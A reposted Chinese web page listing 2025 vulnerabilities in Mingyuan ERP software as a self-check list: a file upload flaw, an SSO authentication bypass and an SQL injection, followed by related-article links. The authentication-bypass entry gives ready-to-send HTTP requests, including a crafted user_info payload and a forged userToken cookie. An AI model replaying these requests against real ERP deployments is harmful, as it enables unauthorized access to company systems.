当前位置: 首页 > news >正文

明源相关漏洞自查清单(2025)

news 2025/8/7 17:08:50

  1. 明源云 ERP 文档服务系统任意文件上传

    1. 漏洞类型:文件上传
    2. 漏洞路径:待确认
    3. 验证方式:待确认

  2. 明源ERP sso/login.aspx身份认证绕过

    1. 漏洞类型:越权
    2. 漏洞路径:/PubPlatform/nav/login/sso/login.aspx
    3. 验证方式: 
      POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded__yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3dGET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;

        

  3. 明源地产 ERP DataRuleXMLHTTP.aspx SQL 注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:DataRuleXMLHTTP.aspx
    3. 验证方式:待确认
http://www.kefakeji.com/news/368.html

相关文章:

  • TCP连接优化的实战经验(3513)
  • 异步编程在Web开发中的应用(3842)
  • Proxmox Backup Server 4.0 Beta - 开源企业级备份解决方案
  • Proxmox Mail Gateway 8.2 - 全面的开源邮件安全平台
  • 数控编程利器!Mastercam 2025 安装教程+汉化全流程解析
  • 阿里云AI安全护栏
  • 浅谈一类容量很大但重量很小的背包——2025.7.27 鲜花
  • Centos8搭建hadoop高可用集群
  • 连载小说《Server》 Part 1 《简幻欢》 序言
  • 折腾笔记[30]-使用bun_python通过javascript优雅调用python库
  • Linux系统目录结构完全指南:目录与文件夹的本质区别
  • 【2025最新】官方Claude API中转服务 | 快速接入Claude 4 API | 国内Claude API接口中转指南
  • 基于Qt封装tomlplusplus得到读写键值对的库
  • AT_abc396_c [ABC396C] Buy Balls 题解
  • [ABC394D] Colorful Bracket Sequence 题解
  • K8S
  • Redis桌面管理工具Another-Redis-Desktop-Manager 1.3.7 安装全流程
  • 1
  • 创建【网络连接】的快捷方式
  • 线性代数
  • 12 MCP Servers的介绍
  • 500部迪士尼电影下载推荐_迪士尼动画大全列表必看网盘分享
  • 点分治
  • 华为荣耀手机还原主屏幕布局
  • ESP IDF引入外部资源文件
  • Day11 矩阵乘法 dp、*常系数齐次线性递推、*动态 dp
  • 亿邮相关漏洞总结
  • 使用DFU模式快速重装macOS15到macbook
  • 大模型的JSON之殇:从脆弱的API调用到稳健的未来
  • [20250727]数论基本概念、最大公约数